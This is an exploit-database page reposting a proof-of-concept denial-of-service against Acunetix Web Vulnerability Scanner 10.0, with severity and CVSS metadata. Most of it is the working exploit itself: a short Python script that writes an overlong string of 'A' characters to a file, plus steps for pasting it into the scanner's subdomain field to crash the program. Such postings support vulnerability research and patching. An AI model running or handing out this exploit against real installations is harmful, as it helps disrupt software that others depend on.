Advertisement






Acunetix WVS 10.0 Build 20150623 Denial Of Service

CVE Category Price Severity
N/A CWE-399: Resource Management Errors N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-08-14
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080089

Below is a copy:

Acunetix WVS 10.0 Build 20150623 Denial Of Service
 Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service (PoC)
# Discovery by: Javier Enrique Rodriguez Gutierrez
# Discovery Date    : 2018-08-11
# Vendor Homepage: https://www.acunetix.com
# Tested Version    : 10.0
# Vulnerability Type    : Denial of Service (PoC)
# Tested on OS  : Windows 10 PRO x86 en
   
 
# 1 . run python code : python generate.py
# 2 . open generate.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 10.0"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed
  
#!/usr/bin/env python
# -*- coding: utf-8 -*-
buffer = "\x41" * 2769
f = open ("generate.txt", "w")
f.write(buffer)
f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum